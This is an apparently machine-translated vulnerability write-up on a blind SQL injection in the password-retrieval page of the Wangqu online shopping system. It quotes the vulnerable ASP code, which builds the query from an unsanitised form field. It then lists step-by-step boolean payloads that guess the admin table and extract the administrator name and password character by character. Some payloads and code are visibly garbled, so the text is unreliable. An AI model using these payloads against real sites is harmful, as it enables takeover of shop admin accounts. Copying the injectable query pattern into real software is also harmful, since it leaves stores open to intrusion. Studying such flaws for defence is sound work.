Analysis of SQL injection vulnerability in Online Shopping System of Wangqu

Author: cnryan @ http://hi.baidu.com/cnryan

Wangqu Online Shopping System is a simple, powerful, and most widely used online shopping shop platform. with years of Online Shopping System R & D experience, the Online Shopping System of Wangqu has become the preferred brand for many users to shop online because of the increasingly powerful and complete software functions and the large user base.

This is the official example.
This SQL injection occurs in password retrieval. The latest version of 9.4 also has a vulnerability, and subsequent tests on versions earlier than v9.0 all have a vulnerability.

Vulnerability page: getpwd2.asp

Vulnerability code:
<%
Username = request. form ("username ")
Set rs = Server. CreateObject ("Adodb. Recordset ")
SQL = "select * from [user] where username =" & username &""
Rs. open SQL, conn, 1, 1
If rs. eof Then
%>

The typical injection is similar to the previous Online Shopping System.

Http: // 127.0.0.1/cnhww9.4/getpwd. asp
Getpwd. asp is the password retrieval page, and the user name entered is handed over to getpwd2.asp. If the user name exists in step 2, exit

Enter test and 1 = 1 and =
Jump to step 2 of getpwd2.asp

Enter test and 1 = 2 and =
This user is not prompted

Guess the table-> cnhww

Test and exists (select * from [admin]) and 1 = 1 F
Test and exists (select * from [cnhww]) and 1 = 1 T

Field-> admin password
Test and exists (select admin from [cnhww]) and 1 = 1 T
Test and exists (select password from [cnhww]) and 1 = 1 T

Value -->
Test and (select top 1 asc (mid (admin, 1,1) from cnhww)> 97 and 1 = 1 F
Test and (select top 1 asc (mid (admin, 1, 1) from cnhww)> 96 and 1 = 1 T
97 =
Test and (select top 1 asc (mid (admin, 100) from cnhww)> and 1 = 1 F
Test and (select top 1 asc (mid (admin, 2, 1) from cnhww)> 99 and 1 = 1 T
100 = d

......

Test and (select top 1 asc (mid (password, 1, 1) from cnhww)> 55 and 1 = 1

......

......